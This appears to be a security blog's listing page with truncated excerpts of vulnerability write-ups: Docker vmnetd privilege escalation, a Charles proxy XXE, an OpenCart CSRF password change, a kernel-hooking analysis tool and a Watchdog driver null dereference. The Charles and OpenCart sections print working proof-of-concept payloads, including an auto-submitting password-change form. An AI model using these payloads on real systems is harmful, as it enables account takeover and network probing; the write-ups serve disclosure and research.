Blog posts

Privilege escalation vulnerability in the latest version of Docker

0x00 Vulnerability analysis

1. com.docker.vmnetd is a launch service that runs with root privileges; it communicates with the client (Docker) through a local socket. Analysis shows that the client is not verified during the communication process, which creates a privilege-escalation risk.

2. The two main functions in main_handle are vmnet_handshake_Perform and vmnetd_commands_Handle. vmnet_handshake_Perform mainly initializes the message and obtains the corresponding client command; vmnetd_commands_Handle calls the corresponding callback function according to the command obtained.

2.1 vmnet_handshake_Perform

2.1.1 First, the initialization message (3 packets) requested by the client is obtained through vmnet_handshake_readInitMessage. The message structure is as follows:

packet-1: flag
c00009a318  56 4d 4e 33 54 00 00 00 00 00 00 00 00 00 00 00  VMN3T...........
c00009a328  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................

packet-2:versi

Charles <= 4.2.7 XML External Entity (XXE) vulnerability

Software Link: https://www.charlesproxy.com
Date: 11.12.2018
Exploit Author: CK01
Version: <= 4.2.7

Security Issue:
An XML External Entity (XXE) vulnerability exists in the Charles import/export settings option. If a user imports a "Charles Settings.xml" supplied by an attacker, the internal network may be probed and information may be leaked.

POC:
1. Charles Settings.xml (127.0.0.1 -> attacker's server):

<?xml version='1.0' encoding='UTF-8' ?>
<?charles serialisation-version='2.0' ?>
<!DOCTYPE data [ <!ENTITY file SYSTEM "jar:http://127.0.0.1:2014/!/">]>
<charles-export>
  <proxyConfiguration>
    <enableSOCKSProxy>false</enableSOCKSProxy>
    <dynamicHTTPPort>false</dynamicHTTPPort>
    <dynamicSOCKSPort>false</dynamicSOCKSPort>
    <enableSOCKSTransparentHTTPProxying>true</enableSOCKSTransparentHTTPProxying>
    <port>8888</port>

Opencart-v3-0-3-0 CSRF vulnerability in user password change

Software Link: https://github.com/opencart/opencart/
Date: 06.28.2018
Exploit Author: CK01
Version: <= V3-0-3-0

0x00 Vulnerability analysis
The user token is not verified when the password is changed, so a CSRF attack can modify the user's password. Affected file: /upload/catalog/controller/account/password.php

0x01 Exploit
Save the following exploit as an HTML file and open it:

<html>
  <body>
    <form id="post123" name="post123" action="http://192.168.0.46/opencart/index.php?route=account/password&language=en-gb" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="password" value="CK01ck01" />
      <input type="hidden" name="confirm" value="CK01ck01" />
      <script>
        document.getElementById('post123').submit();
      </script>
    </form>
  </body>
</html>

Kernel vulnerability analysis helper tool

0x00 IopfCompleteRequest function hook
1. Get the load base of the nt module, add a fixed RVA, and inline-hook the first 5 opcode bytes of the IopfCompleteRequest function.
2. MyIopfCompleteRequest mainly checks whether the IoControlCode is the target IoControlCode; if so, it filters out the needed information (target IoControlCode (g_IoCode), return address (retAddr), load base of the target driver (BugSysBase), return address RVA (retAddr Rva)).

0x01 IRP handler function hook
1. Inline-hook using the IRP handler function RVA passed in from ring 3.
2. MyIrpFun mainly does the following: sets an int3 breakpoint for convenient debugging; filters the buffer and size information passed in from ring 3; restores the original instructions in the filter function, then executes back to the original IRP handler function.
2.1 Before executing back to the original IRP handler function, the return address is modified to the address of the hook function (retHookA); when the original IRP handler finishes and returns, it jumps to the retHookA function, which re-hooks.

0x02 Practical example: HackSysTeam pool overflow
1. During vulnerability analysis, a PoC can usually be obtained (here I wrote a PoC that does not overflow; once the overflow produces a BSOD, no information can be printed; in actual analysis, the PoC code can be modified after the IRP handler function has been determined):

int main() {
    DWORD retLen;
    CHAR inputbuff[0x90] = { 0 };
    DWORD intputLen;
    HANDLE hDevice = CreateFileW( L"\\\\.\\HacksysExtremeVulne

Watchdog Anti-Malware Null Pointer Dereference Vulnerability

0x00 Fuzz
1. Download the latest version from https://www.watchdogdevelopment.com/ for testing.
   Software version: 2.74.186.426
   Driver version: 2.74.0.259
2. Statically analyze the driver module to find the IRP processing function.
3. Fuzz the 80002010 control code; the system produces a BSOD.

0x01 Vulnerability analysis
1. Here I use the tool I wrote to assist the analysis. The IRP function is hooked through the RVA of the passed-in IRP function and the driver.
2. Re-run the fuzz; it breaks into the MyIrpFun function. Single-stepping here, the helper tool shows that the incoming buff is empty (the first fuzz fills with 0x41, the second fuzz fills with 0).
3. Keep single-stepping and you quickly reach the place where the null pointer is dereferenced.
Since the buf passed in from ring 3 is not checked for null, the content